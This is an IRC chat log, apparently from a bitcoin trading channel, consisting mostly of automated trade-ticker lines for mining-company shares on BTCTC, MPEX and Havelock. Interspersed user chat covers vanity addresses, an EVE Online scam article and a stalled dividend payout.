[BTCTC] [ACTIVEMINING] 160 @ 0.00585 = 0.936 BTC [-] Aug 01 08:30:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.04185 BTC [-] Aug 01 08:30:57 [BTCTC] [BTCGARDEN] 82 @ 0.016 = 1.312 BTC [+] Aug 01 08:31:04 [BTCTC] [TAT.ASICMINER] 7 @ 0.04185 = 0.293 BTC [-] Aug 01 08:31:05 [BTCTC] [LABCOIN] 1 @ 0.002901 BTC [-] Aug 01 08:31:09 [BTCTC] [LABCOIN] 45 @ 0.0029 = 0.1305 BTC [-] Aug 01 08:31:26 [BTCTC] [DMS.MINING] 2 @ 0.007649 = 0.0153 BTC [-] Aug 01 08:31:27 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 01 08:31:53 [MPEX] [S.MPOE] 8890 @ 0.00080858 = 7.1883 BTC [-] Aug 01 08:32:15 [BTCTC] [LABCOIN] 8 @ 0.0029 = 0.0232 BTC [-] Aug 01 08:32:18 [BTCTC] [LABCOIN] 51 @ 0.002822 = 0.1439 BTC [-] Aug 01 08:32:21 [BTCTC] [LABCOIN] 1000 @ 0.002822 = 2.822 BTC [-] Aug 01 08:32:23 [BTCTC] [LABCOIN] 1000 @ 0.002821 = 2.821 BTC [-] Aug 01 08:32:26 [BTCTC] [LABCOIN] 694 @ 0.002771 = 1.9231 BTC [-] Aug 01 08:33:02 [BTCTC] [LABCOIN] 406 @ 0.002771 = 1.125 BTC [-] Aug 01 08:33:04 [BTCTC] [LABCOIN] 70 @ 0.00277 = 0.1939 BTC [-] Aug 01 08:33:06 http://www.pcgamer.com/2013/06/27/isk-scams-eve-online/ Aug 01 08:33:07 [BTCTC] [LABCOIN] 24 @ 0.002762 = 0.0663 BTC [-] Aug 01 08:33:09 this isn't so bad. Aug 01 08:33:12 Risk = ISK: Finding EVE Online's most sophisticated scam | News | PC Gamer Aug 01 08:33:22 [BTCTC] [LABCOIN] 100 @ 0.002969 = 0.2969 BTC [+] Aug 01 08:34:58 [BTCTC] [LABCOIN] 1 @ 0.00296 BTC [-] Aug 01 08:35:29 [BTCTC] [PAJKA.BOND] 2 @ 0.01533 = 0.0307 BTC [-] Aug 01 08:36:25 [BTCTC] [ASICMINER-PT] 1 @ 4.08 BTC [-] Aug 01 08:36:30 [BTCTC] [ASICMINER-PT] 1 @ 4.07 BTC [-] Aug 01 08:36:36 [BTCTC] [ASICMINER-PT] 1 @ 4.061 BTC [-] Aug 01 08:36:44 [BTCTC] [ASICMINER-PT] 2 @ 4.06 = 8.12 BTC [-] Aug 01 08:36:48 [BTCTC] [ASICMINER-PT] 1 @ 4.056 BTC [-] Aug 01 08:36:52 [BTCTC] [ASICMINER-PT] 2 @ 4.055 = 8.11 BTC [-] Aug 01 08:36:57 [BTCTC] [ASICMINER-PT] 2 @ 4.02 = 8.04 BTC [-] Aug 01 08:37:03 [BTCTC] [ASICMINER-PT] 1 @ 4.011 BTC [-] Aug 01 08:37:30 [BTCTC] [LABCOIN] 450 @ 0.0028 = 1.26 BTC [-] Aug 01 08:37:37 [BTCTC] [LABCOIN] 1476 @ 0.002791 = 4.1195 BTC [-] Aug 01 08:37:48 [BTCTC] [LABCOIN] 1000 @ 0.00279 = 2.79 BTC [-] Aug 01 08:37:54 [BTCTC] [ASICMINER-PT] 1 @ 4.011 BTC [-] Aug 01 08:38:29 [BTCTC] [ACTIVEMINING] 3 @ 0.005852 = 0.0176 BTC [+] Aug 01 08:38:31 [BTCTC] [ACTIVEMINING] 11 @ 0.00592 = 0.0651 BTC [+] Aug 01 08:38:37 [BTCTC] [ACTIVEMINING] 16 @ 0.006049 = 0.0968 BTC [+] Aug 01 08:39:24 [BTCTC] [ACTIVEMINING] 25 @ 0.006049 = 0.1512 BTC [+] Aug 01 08:39:24 [BTCTC] [LABCOIN] 1000 @ 0.002805 = 2.805 BTC [+] Aug 01 08:39:31 [BTCTC] [ACTIVEMINING] 100 @ 0.00605 = 0.605 BTC [+] Aug 01 08:41:28 [BTCTC] [BTCGARDEN] 24 @ 0.01597 = 0.3833 BTC [-] Aug 01 08:41:29 [BTCTC] [LABCOIN] 500 @ 0.002769 = 1.3845 BTC [-] Aug 01 08:41:32 [BTCTC] [BTCGARDEN] 50 @ 0.01597 = 0.7985 BTC [-] Aug 01 08:41:34 [BTCTC] [BTCGARDEN] 50 @ 0.01597 = 0.7985 BTC [-] Aug 01 08:41:40 [BTCTC] [BTCGARDEN] 76 @ 0.01597 = 1.2137 BTC [-] Aug 01 08:41:42 [BTCTC] [LABCOIN] 1000 @ 0.002768 = 2.768 BTC [-] Aug 01 08:41:45 [BTCTC] [LABCOIN] 100 @ 0.002766 = 0.2766 BTC [-] Aug 01 08:41:47 [BTCTC] [LABCOIN] 1234 @ 0.002765 = 3.412 BTC [-] Aug 01 08:41:48 [BTCTC] [LABCOIN] 1111 @ 0.002761 = 3.0675 BTC [-] Aug 01 08:41:50 [BTCTC] [LABCOIN] 1275 @ 0.002751 = 3.5075 BTC [-] Aug 01 08:41:52 [BTCTC] [LABCOIN] 1500 @ 0.00275 = 4.125 BTC [-] Aug 01 08:41:54 [BTCTC] [LABCOIN] 5000 @ 0.00275 = 13.75 BTC [-] Aug 01 08:41:56 [BTCTC] [LABCOIN] 5090 @ 0.00274 = 13.9466 BTC [-] Aug 01 08:41:58 [BTCTC] [LABCOIN] 1000 @ 0.002725 = 2.725 BTC [-] Aug 01 08:42:00 [BTCTC] [LABCOIN] 1497 @ 0.002714 = 4.0629 BTC [-] Aug 01 08:42:02 [BTCTC] [LABCOIN] 700 @ 0.00271 = 1.897 BTC [-] Aug 01 08:42:04 [BTCTC] [LABCOIN] 1450 @ 0.002709 = 3.9281 BTC [-] Aug 01 08:42:07 [BTCTC] [LABCOIN] 50 @ 0.002706 = 0.1353 BTC [-] Aug 01 08:42:09 who wants to bet that i have the best bitcoin address in existence Aug 01 08:42:10 [BTCTC] [LABCOIN] 3365 @ 0.002703 = 9.0956 BTC [-] Aug 01 08:42:11 [BTCTC] [LABCOIN] 5000 @ 0.002702 = 13.51 BTC [-] Aug 01 08:42:14 [BTCTC] [LABCOIN] 450 @ 0.002701 = 1.2155 BTC [-] Aug 01 08:42:17 [BTCTC] [LABCOIN] 250 @ 0.002701 = 0.6753 BTC [-] Aug 01 08:42:21 [BTCTC] [LABCOIN] 4200 @ 0.002701 = 11.3442 BTC [-] Aug 01 08:42:21 starts with Aug 01 08:42:25 1ACop Aug 01 08:42:26 [BTCTC] [LABCOIN] 2000 @ 0.002667 = 5.334 BTC [-] Aug 01 08:42:29 [BTCTC] [LABCOIN] 40 @ 0.002666 = 0.1066 BTC [-] Aug 01 08:42:31 [BTCTC] [LABCOIN] 80 @ 0.002666 = 0.2133 BTC [-] Aug 01 08:42:35 [BTCTC] [LABCOIN] 1 @ 0.00266 BTC [-] Aug 01 08:42:35 1urMom is better Aug 01 08:42:37 [BTCTC] [LABCOIN] 109 @ 0.00265 = 0.2889 BTC [-] Aug 01 08:42:41 [BTCTC] [LABCOIN] 1000 @ 0.00262 = 2.62 BTC [-] Aug 01 08:42:44 [BTCTC] [LABCOIN] 200 @ 0.00262 = 0.524 BTC [-] Aug 01 08:42:45 someone has that? Aug 01 08:42:45 [BTCTC] [LABCOIN] 2000 @ 0.002605 = 5.21 BTC [-] Aug 01 08:42:50 [BTCTC] [LABCOIN] 1000 @ 0.002602 = 2.602 BTC [-] Aug 01 08:42:52 [BTCTC] [LABCOIN] 5000 @ 0.002601 = 13.005 BTC [-] Aug 01 08:42:53 it's not so hard to get vanity addies you know Aug 01 08:42:54 [BTCTC] [LABCOIN] 1020 @ 0.0026 = 2.652 BTC [-] Aug 01 08:42:57 [BTCTC] [LABCOIN] 1000 @ 0.0026 = 2.6 BTC [-] Aug 01 08:43:02 esp 5 lettrers. i've seen people get 6-7 Aug 01 08:43:05 [BTCTC] [LABCOIN] 500 @ 0.0026 = 1.3 BTC [-] Aug 01 08:43:17 [BTCTC] [LABCOIN] 1030 @ 0.002705 = 2.7862 BTC [+] Aug 01 08:43:19 yeah but how sick is 1ACop if you're inclined for SR (which I'm not) Aug 01 08:43:22 [BTCTC] [LABCOIN] 216 @ 0.002601 = 0.5618 BTC [-] Aug 01 08:43:39 lol Aug 01 08:43:53 [BTCTC] [LABCOIN] 3754 @ 0.002601 = 9.7642 BTC [-] Aug 01 08:43:58 buyinc cockain. plz send invoice to 1hooker Aug 01 08:44:06 [BTCTC] [LABCOIN] 3000 @ 0.002526 = 7.578 BTC [-] Aug 01 08:44:08 [BTCTC] [LABCOIN] 1000 @ 0.002525 = 2.525 BTC [-] Aug 01 08:44:12 [BTCTC] [LABCOIN] 1000 @ 0.00252 = 2.52 BTC [-] Aug 01 08:44:33 [BTCTC] [ACTIVEMINING] 25 @ 0.005901 = 0.1475 BTC [-] Aug 01 08:44:44 [BTCTC] [TAT.ASICMINER] 14 @ 0.04185 = 0.5859 BTC [-] Aug 01 08:45:12 [BTCTC] [TAT.ASICMINER] 40 @ 0.04185 = 1.674 BTC [-] Aug 01 08:45:25 [BTCTC] [TAT.ASICMINER] 19 @ 0.04185 = 0.7952 BTC [-] Aug 01 08:45:30 [BTCTC] [ACTIVEMINING] 25 @ 0.006094 = 0.1524 BTC [+] Aug 01 08:45:32 [BTCTC] [ACTIVEMINING] 50 @ 0.006095 = 0.3048 BTC [+] Aug 01 08:45:35 [BTCTC] [ACTIVEMINING] 66 @ 0.006097 = 0.4024 BTC [+] Aug 01 08:45:38 [BTCTC] [ACTIVEMINING] 95 @ 0.0061 = 0.5795 BTC [+] Aug 01 08:45:41 [BTCTC] [ACTIVEMINING] 4010 @ 0.0061 = 24.461 BTC [+] Aug 01 08:48:27 [BTCTC] [LABCOIN] 100 @ 0.002887 = 0.2887 BTC [+] Aug 01 08:49:01 [BTCTC] [BTCGARDEN] 44 @ 0.016 = 0.704 BTC [+] Aug 01 08:49:19 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 01 08:51:21 [HAVELOCK] [AM100] 1 @ 0.0398999 BTC [-] Aug 01 08:51:31 [BTCTC] [LABCOIN] 900 @ 0.002622 = 2.3598 BTC [-] Aug 01 08:52:33 [BTCTC] [LABCOIN] 100 @ 0.002622 = 0.2622 BTC [-] Aug 01 08:52:35 [BTCTC] [LABCOIN] 1000 @ 0.00262 = 2.62 BTC [-] Aug 01 08:52:39 [BTCTC] [LABCOIN] 717 @ 0.002612 = 1.8728 BTC [-] Aug 01 08:53:07 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199 BTC [+] Aug 01 08:54:16 [HAVELOCK] [KCIM] 1 @ 0.8401 BTC [-] Aug 01 08:54:53 mircea_popescu: https://bitcointalk.org/index.php?topic=263445.msg2845052#msg2845052 Aug 01 08:55:45 [BTCTC] [ACTIVEMINING] 20 @ 0.00635 = 0.127 BTC [+] Aug 01 08:56:11 [BTCTC] [LABCOIN] 1000 @ 0.002622 = 2.622 BTC [+] Aug 01 08:56:15 [BTCTC] [LABCOIN] 30 @ 0.00262 = 0.0786 BTC [-] Aug 01 08:56:17 [BTCTC] [LABCOIN] 50 @ 0.002613 = 0.1307 BTC [-] Aug 01 08:56:20 [BTCTC] [LABCOIN] 783 @ 0.002612 = 2.0452 BTC [-] Aug 01 08:56:22 [BTCTC] [LABCOIN] 50 @ 0.002612 = 0.1306 BTC [-] Aug 01 08:56:24 [BTCTC] [LABCOIN] 1 @ 0.002601 BTC [-] Aug 01 08:56:27 [BTCTC] [LABCOIN] 16 @ 0.002601 = 0.0416 BTC [-] Aug 01 08:57:10 [BTCTC] [ACTIVEMINING] 25 @ 0.006101 = 0.1525 BTC [-] Aug 01 08:57:37 [BTCTC] [LABCOIN] 1000 @ 0.002621 = 2.621 BTC [+] Aug 01 08:58:29 well i guess he'll eventually figure out how to leave a comment on wordpress or something Aug 01 08:59:07 [BTCTC] [ACTIVEMINING] 25 @ 0.006301 = 0.1575 BTC [+] Aug 01 08:59:24 [BTCTC] [ACTIVEMINING] 130 @ 0.0063 = 0.819 BTC [-] Aug 01 08:59:45 [BTCTC] [LABCOIN] 30 @ 0.00278 = 0.0834 BTC [+] Aug 01 09:00:20 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 01 09:00:32 [BTCTC] [BTCGARDEN] 6 @ 0.016 = 0.096 BTC [+] Aug 01 09:00:34 [BTCTC] [LABCOIN] 1000 @ 0.002571 = 2.571 BTC [-] Aug 01 09:00:38 [BTCTC] [LABCOIN] 100 @ 0.002571 = 0.2571 BTC [-] Aug 01 09:00:41 [BTCTC] [LABCOIN] 2000 @ 0.00257 = 5.14 BTC [-] Aug 01 09:00:46 bah Excessive wait trying to get lock Aug 01 09:00:48 [BTCTC] [LABCOIN] 2000 @ 0.002525 = 5.05 BTC [-] Aug 01 09:00:52 [BTCTC] [LABCOIN] 1000 @ 0.002523 = 2.523 BTC [-] Aug 01 09:01:04 [BTCTC] [ACTIVEMINING] 25 @ 0.006101 = 0.1525 BTC [-] Aug 01 09:01:05 [BTCTC] [LABCOIN] 3000 @ 0.002522 = 7.566 BTC [-] Aug 01 09:01:31 [BTCTC] [LABCOIN] 1000 @ 0.002522 = 2.522 BTC [-] Aug 01 09:01:33 [BTCTC] [LABCOIN] 1000 @ 0.00252 = 2.52 BTC [-] Aug 01 09:01:35 [BTCTC] [LABCOIN] 674 @ 0.00252 = 1.6985 BTC [-] Aug 01 09:01:45 [BTCTC] [LABCOIN] 474 @ 0.00252 = 1.1945 BTC [-] Aug 01 09:02:01 [BTCTC] [BASIC-MINING] 1 @ 0.4231 BTC [+] Aug 01 09:02:02 [BTCTC] [ACTIVEMINING] 25 @ 0.006101 = 0.1525 BTC [-] Aug 01 09:02:05 [BTCTC] [LABCOIN] 599 @ 0.002785 = 1.6682 BTC [+] Aug 01 09:02:10 [BTCTC] [LABCOIN] 400 @ 0.002786 = 1.1144 BTC [+] Aug 01 09:02:12 [BTCTC] [LABCOIN] 742 @ 0.002894 = 2.1473 BTC [+] Aug 01 09:02:14 [BTCTC] [LABCOIN] 1484 @ 0.002895 = 4.2962 BTC [+] Aug 01 09:02:18 [BTCTC] [LABCOIN] 159 @ 0.002895 = 0.4603 BTC [+] Aug 01 09:03:09 [BTCTC] [ACTIVEMINING] 25 @ 0.006101 = 0.1525 BTC [-] Aug 01 09:03:23 [BTCTC] [LABCOIN] 1 @ 0.002893 BTC [-] Aug 01 09:03:48 [BTCTC] [ACTIVEMINING] 150 @ 0.0061 = 0.915 BTC [-] Aug 01 09:04:28 [BTCTC] [TAT.ASICMINER] 7 @ 0.04001 = 0.2801 BTC [-] Aug 01 09:05:26 [BTCTC] [ASICMINER-PT] 1 @ 4.186 BTC [+] Aug 01 09:06:13 [BTCTC] [ACTIVEMINING] 50 @ 0.006001 = 0.3001 BTC [-] Aug 01 09:07:29 [HAVELOCK] [SDSTM] 5 @ 0.008899 = 0.0445 BTC [+] Aug 01 09:08:57 [BTCTC] [ACTIVEMINING] 924 @ 0.006 = 5.544 BTC [-] Aug 01 09:09:40 [BTCTC] [LABCOIN] 13 @ 0.002893 = 0.0376 BTC [-] Aug 01 09:09:45 [HAVELOCK] [SDSTM] 3 @ 0.008899 = 0.0267 BTC [+] Aug 01 09:10:38 [BTCTC] [BTCGARDEN] 800 @ 0.01596 = 12.768 BTC [-] Aug 01 09:10:43 [BTCTC] [BTCGARDEN] 15 @ 0.01596 = 0.2394 BTC [-] Aug 01 09:10:47 [BTCTC] [BTCGARDEN] 2 @ 0.01596 = 0.0319 BTC [-] Aug 01 09:11:37 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 01 09:11:43 [BTCTC] [BTCGARDEN] 41 @ 0.016 = 0.656 BTC [+] Aug 01 09:12:11 [BTCTC] [ACTIVEMINING] 25 @ 0.006193 = 0.1548 BTC [+] Aug 01 09:12:12 [BTCTC] [ACTIVEMINING] 25 @ 0.006194 = 0.1549 BTC [+] Aug 01 09:12:55 [BTCTC] [LABCOIN] 90 @ 0.00275 = 0.2475 BTC [-] Aug 01 09:12:58 [BTCTC] [LABCOIN] 3610 @ 0.0027 = 9.747 BTC [-] Aug 01 09:13:29 [BTCTC] [BTCGARDEN] 160 @ 0.016 = 2.56 BTC [+] Aug 01 09:13:53 [BTCTC] [BTCGARDEN] 16 @ 0.01599 = 0.2558 BTC [-] Aug 01 09:14:07 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 01 09:14:11 [BTCTC] [ACTIVEMINING] 5 @ 0.006002 = 0.03 BTC [-] Aug 01 09:15:40 [BTCTC] [BTCGARDEN] 30 @ 0.016 = 0.48 BTC [+] Aug 01 09:15:48 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 01 09:16:08 [BTCTC] [BASIC-MINING] 1 @ 0.423 BTC [-] Aug 01 09:17:54 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [+] Aug 01 09:18:13 [BTCTC] [ACTIVEMINING] 25 @ 0.006191 = 0.1548 BTC [+] Aug 01 09:18:44 [BTCTC] [LABCOIN] 101 @ 0.002705 = 0.2732 BTC [+] Aug 01 09:18:48 [BTCTC] [BTCGARDEN] 347 @ 0.016 = 5.552 BTC [+] Aug 01 09:19:42 [BTCTC] [ACTIVEMINING] 25 @ 0.006004 = 0.1501 BTC [-] Aug 01 09:19:43 [BTCTC] [BTCGARDEN] 20 @ 0.01599 = 0.3198 BTC [-] Aug 01 09:19:46 [BTCTC] [ACTIVEMINING] 50 @ 0.006003 = 0.3002 BTC [-] Aug 01 09:20:23 [BTCTC] [BTCGARDEN] 56 @ 0.01599 = 0.8954 BTC [-] Aug 01 09:21:00 [BTCTC] [ACTIVEMINING] 25 @ 0.006191 = 0.1548 BTC [+] Aug 01 09:21:21 [BTCTC] [ASICMINER-PT] 1 @ 4.013 BTC [-] Aug 01 09:21:24 [BTCTC] [ASICMINER-PT] 5 @ 4.013 = 20.065 BTC [-] Aug 01 09:21:27 [BTCTC] [ASICMINER-PT] 5 @ 4.012 = 20.06 BTC [-] Aug 01 09:21:31 [BTCTC] [ASICMINER-PT] 4 @ 4.011 = 16.044 BTC [-] Aug 01 09:21:31 [BTCTC] [LABCOIN] 100 @ 0.0027 = 0.27 BTC [-] Aug 01 09:21:34 [BTCTC] [ASICMINER-PT] 10 @ 4.01 = 40.1 BTC [-] Aug 01 09:21:37 [BTCTC] [ASICMINER-PT] 10 @ 4.01 = 40.1 BTC [-] Aug 01 09:21:51 [BTCTC] [BASIC-MINING] 1 @ 0.4597 BTC [+] Aug 01 09:22:04 [BTCTC] [BTCGARDEN] 212 @ 0.016 = 3.392 BTC [+] Aug 01 09:23:18 [BTCTC] [LABCOIN] 97 @ 0.002849 = 0.2764 BTC [+] Aug 01 09:23:22 [BTCTC] [LABCOIN] 74 @ 0.002875 = 0.2128 BTC [+] Aug 01 09:23:24 [BTCTC] [LABCOIN] 487 @ 0.002875 = 1.4001 BTC [+] Aug 01 09:23:28 [BTCTC] [LABCOIN] 600 @ 0.002876 = 1.7256 BTC [+] Aug 01 09:23:32 [BTCTC] [LABCOIN] 4300 @ 0.002876 = 12.3668 BTC [+] Aug 01 09:23:36 [BTCTC] [LABCOIN] 1750 @ 0.002887 = 5.0523 BTC [+] Aug 01 09:23:39 [BTCTC] [LABCOIN] 4404 @ 0.00289 = 12.7276 BTC [+] Aug 01 09:23:41 [BTCTC] [LABCOIN] 1340 @ 0.002897 = 3.882 BTC [+] Aug 01 09:23:44 [BTCTC] [LABCOIN] 15000 @ 0.002897 = 43.455 BTC [+] Aug 01 09:23:46 [BTCTC] [LABCOIN] 1000 @ 0.002898 = 2.898 BTC [+] Aug 01 09:23:51 [BTCTC] [LABCOIN] 440 @ 0.0029 = 1.276 BTC [+] Aug 01 09:23:58 [BTCTC] [LABCOIN] 2000 @ 0.002914 = 5.828 BTC [+] Aug 01 09:24:01 [BTCTC] [BASIC-MINING] 1 @ 0.4015 BTC [-] Aug 01 09:24:05 [BTCTC] [LABCOIN] 1000 @ 0.002916 = 2.916 BTC [+] Aug 01 09:24:10 [BTCTC] [LABCOIN] 1 @ 0.002916 BTC [+] Aug 01 09:24:13 [BTCTC] [LABCOIN] 1000 @ 0.002933 = 2.933 BTC [+] Aug 01 09:24:18 [BTCTC] [LABCOIN] 1500 @ 0.002935 = 4.4025 BTC [+] Aug 01 09:24:26 [BTCTC] [LABCOIN] 100 @ 0.002949 = 0.2949 BTC [+] Aug 01 09:24:31 [BTCTC] [LABCOIN] 1000 @ 0.002949 = 2.949 BTC [+] Aug 01 09:24:34 [BTCTC] [LABCOIN] 90 @ 0.00295 = 0.2655 BTC [+] Aug 01 09:24:36 [BTCTC] [LABCOIN] 1500 @ 0.002963 = 4.4445 BTC [+] Aug 01 09:24:41 [BTCTC] [LABCOIN] 1000 @ 0.002979 = 2.979 BTC [+] Aug 01 09:24:47 [BTCTC] [LABCOIN] 1000 @ 0.002979 = 2.979 BTC [+] Aug 01 09:24:51 Heard theres all new scams coming out for 2014. You can get your zero-days here folks. Aug 01 09:24:55 [BTCTC] [LABCOIN] 1000 @ 0.003 = 3 BTC [+] Aug 01 09:25:38 we got in before that, meaning youre late to the show already Aug 01 09:25:41 [BTCTC] [LABCOIN] 1 @ 0.00275 BTC [-] Aug 01 09:25:49 [BTCTC] [ACTIVEMINING] 23 @ 0.006189 = 0.1423 BTC [-] Aug 01 09:26:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.04002 BTC [+] Aug 01 09:26:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.04002 = 0.2001 BTC [+] Aug 01 09:27:41 i wonder how the applications of english language would look if it were chiefly spoken by able people who do things rather than as it is now, by entitled nimrods doing nothing at all. Aug 01 09:28:45 [BTCTC] [TAT.MINIGAME] 1 @ 0.00029 BTC [+] Aug 01 09:28:46 [BTCTC] [LABCOIN] 100 @ 0.002995 = 0.2995 BTC [+] Aug 01 09:29:45 [BTCTC] [TAT.MINIGAME] 1000 @ 0.0002987 = 0.2987 BTC [+] Aug 01 09:29:54 you would be one of the few to understand it i presume Aug 01 09:30:29 [BTCTC] [CRYPTO-TRADE] 5 @ 0.199 = 0.995 BTC [+] Aug 01 09:30:31 [BTCTC] [LABCOIN] 1 @ 0.002995 BTC [+] Aug 01 09:30:45 [BTCTC] [CRYPTO-TRADE] 18 @ 0.2 = 3.6 BTC [+] Aug 01 09:31:57 [BTCTC] [BITVPS] 7 @ 0.001608 = 0.0113 BTC [-] Aug 01 09:32:01 [BTCTC] [BITVPS] 500 @ 0.001607 = 0.8035 BTC [-] Aug 01 09:32:08 [BTCTC] [BITVPS] 75 @ 0.001605 = 0.1204 BTC [-] Aug 01 09:32:11 [BTCTC] [BITVPS] 1 @ 0.0016 BTC [-] Aug 01 09:32:17 [BTCTC] [BITVPS] 664 @ 0.001502 = 0.9973 BTC [-] Aug 01 09:32:22 [BTCTC] [BITVPS] 25 @ 0.001501 = 0.0375 BTC [-] Aug 01 09:32:40 btw why so annoyed? what happened Aug 01 09:33:15 [BTCTC] [ACTIVEMINING] 25 @ 0.00601 = 0.1503 BTC [-] Aug 01 09:33:32 [BTCTC] [LABCOIN] 650 @ 0.002995 = 1.9468 BTC [+] Aug 01 09:34:39 [BTCTC] [ACTIVEMINING] 25 @ 0.00601 = 0.1503 BTC [-] Aug 01 09:35:10 [BTCTC] [ACTIVEMINING] 50 @ 0.006009 = 0.3005 BTC [-] Aug 01 09:35:45 [BTCTC] [ACTIVEMINING] 287 @ 0.006007 = 1.724 BTC [-] Aug 01 09:35:51 [BTCTC] [ACTIVEMINING] 491 @ 0.006005 = 2.9485 BTC [-] Aug 01 09:36:01 [BTCTC] [LABCOIN] 9 @ 0.00299 = 0.0269 BTC [-] Aug 01 09:37:30 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] Aug 01 09:37:38 [BTCTC] [ACTIVEMINING] 25 @ 0.006008 = 0.1502 BTC [+] Aug 01 09:40:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.041 = 0.41 BTC [+] Aug 01 09:40:39 [BTCTC] [LABCOIN] 250 @ 0.00299 = 0.7475 BTC [-] Aug 01 09:40:43 [BTCTC] [LABCOIN] 1 @ 0.00299 BTC [-] Aug 01 09:40:50 [BTCTC] [LABCOIN] 1 @ 0.00299 BTC [-] Aug 01 09:40:59 [BTCTC] [TAT.ASICMINER] 15 @ 0.04101 = 0.6152 BTC [+] Aug 01 09:42:01 [BTCTC] [ASICMINER-PT] 1 @ 3.953 BTC [-] Aug 01 09:42:21 [BTCTC] [LABCOIN] 208 @ 0.00299 = 0.6219 BTC [-] Aug 01 09:42:41 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [+] Aug 01 09:43:10 [BTCTC] [BTCGARDEN] 615 @ 0.016 = 9.84 BTC [+] Aug 01 09:43:12 [BTCTC] [DMS.SELLING] 30 @ 0.02201 = 0.6603 BTC [+] Aug 01 09:43:51 [BTCTC] [LABCOIN] 63 @ 0.00299 = 0.1884 BTC [-] Aug 01 09:44:30 [BTCTC] [LABCOIN] 80 @ 0.00299 = 0.2392 BTC [-] Aug 01 09:44:56 [BTCTC] [LABCOIN] 50 @ 0.00299 = 0.1495 BTC [-] Aug 01 09:45:26 [BTCTC] [LABCOIN] 71 @ 0.00299 = 0.2123 BTC [-] Aug 01 09:47:01 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002934 BTC [+] Aug 01 09:47:03 [BTCTC] [ACTIVEMINING] 15 @ 0.006101 = 0.0915 BTC [+] Aug 01 09:47:04 [BTCTC] [TAT.ASICMINER] 6 @ 0.0412 = 0.2472 BTC [+] Aug 01 09:47:21 [BTCTC] [LABCOIN] 41 @ 0.00299 = 0.1226 BTC [-] Aug 01 09:47:55 hmm Aug 01 09:47:57 [BTCTC] [TAT.ASICMINER] 13 @ 0.0412 = 0.5356 BTC [+] Aug 01 09:48:03 [BTCTC] [TAT.ASICMINER] 50 @ 0.0412 = 2.06 BTC [+] Aug 01 09:48:09 seems btct's AM div payout queue is broken. 30mins past Aug 01 09:48:10 [BTCTC] [TAT.ASICMINER] 5 @ 0.0412 = 0.206 BTC [+] Aug 01 09:48:31 [BTCTC] [ASICMINER-PT] 1 @ 3.966 BTC [+] Aug 01 09:49:06 [BTCTC] [TAT.ASICMINER] 2 @ 0.041 = 0.082 BTC [-] Aug 01 09:50:02 [BTCTC] [TAT.ASICMINER] 14 @ 0.04119 = 0.5767 BTC [+] Aug 01 09:50:37 [BTCTC] [TAT.ASICMINER] 28 @ 0.041 = 1.148 BTC [-] Aug 01 09:50:58 [BTCTC] [TAT.ASICMINER] 7 @ 0.04169 = 0.2918 BTC [+] Aug 01 09:51:05 [BTCTC] [ACTIVEMINING] 25 @ 0.0061 = 0.1525 BTC [-] Aug 01 09:51:43 [BTCTC] [BTC-BOND] 385 @ 0.0099 = 3.8115 BTC [-] Aug 01 09:52:42 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [+] Aug 01 09:53:19 [BTCTC] [LABCOIN] 1000 @ 0.00298 = 2.98 BTC [-] Aug 01 09:53:29 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 01 09:53:39 [BTCTC] [BTCGARDEN] 62 @ 0.016 = 0.992 BTC [+] Aug 01 09:53:40 [BTCTC] [ACTIVEMINING] 4 @ 0.0061 = 0.0244 BTC [-] Aug 01 09:53:46 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 09:53:53 [BTCTC] [BTCGARDEN] 262 @ 0.016 = 4.192 BTC [+] Aug 01 09:53:56 [BTCTC] [BTCGARDEN] 18 @ 0.016 = 0.288 BTC [+] Aug 01 09:54:01 [BTCTC] [BTCGARDEN] 110 @ 0.016 = 1.76 BTC [+] Aug 01 09:54:20 [BTCTC] [BTCGARDEN] 41 @ 0.016 = 0.656 BTC [+] Aug 01 09:54:21 [BTCTC] [LABCOIN] 250 @ 0.00299 = 0.7475 BTC [+] Aug 01 09:54:22 [BTCTC] [ACTIVEMINING] 41 @ 0.0061 = 0.2501 BTC [-] Aug 01 09:54:29 [BTCTC] [BTCGARDEN] 2050 @ 0.016 = 32.8 BTC [+] Aug 01 09:54:33 [BTCTC] [BTCGARDEN] 350 @ 0.016 = 5.6 BTC [+] Aug 01 09:54:38 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 01 09:54:44 [BTCTC] [LABCOIN] 870 @ 0.00298 = 2.5926 BTC [-] Aug 01 09:54:47 [BTCTC] [LABCOIN] 580 @ 0.00298 = 1.7284 BTC [-] Aug 01 09:55:03 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 09:55:14 [BTCTC] [LABCOIN] 474 @ 0.00299 = 1.4173 BTC [+] Aug 01 09:55:16 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 01 09:55:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.04169 BTC [+] Aug 01 09:55:21 [BTCTC] [LABCOIN] 393 @ 0.00299 = 1.1751 BTC [+] Aug 01 09:55:23 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 01 09:55:27 [BTCTC] [LABCOIN] 390 @ 0.00298 = 1.1622 BTC [-] Aug 01 09:57:31 [BTCTC] [LABCOIN] 2500 @ 0.002901 = 7.2525 BTC [-] Aug 01 09:57:35 [BTCTC] [LABCOIN] 1100 @ 0.0029 = 3.19 BTC [-] Aug 01 09:58:01 [BTCTC] [ACTIVEMINING] 25 @ 0.006177 = 0.1544 BTC [+] 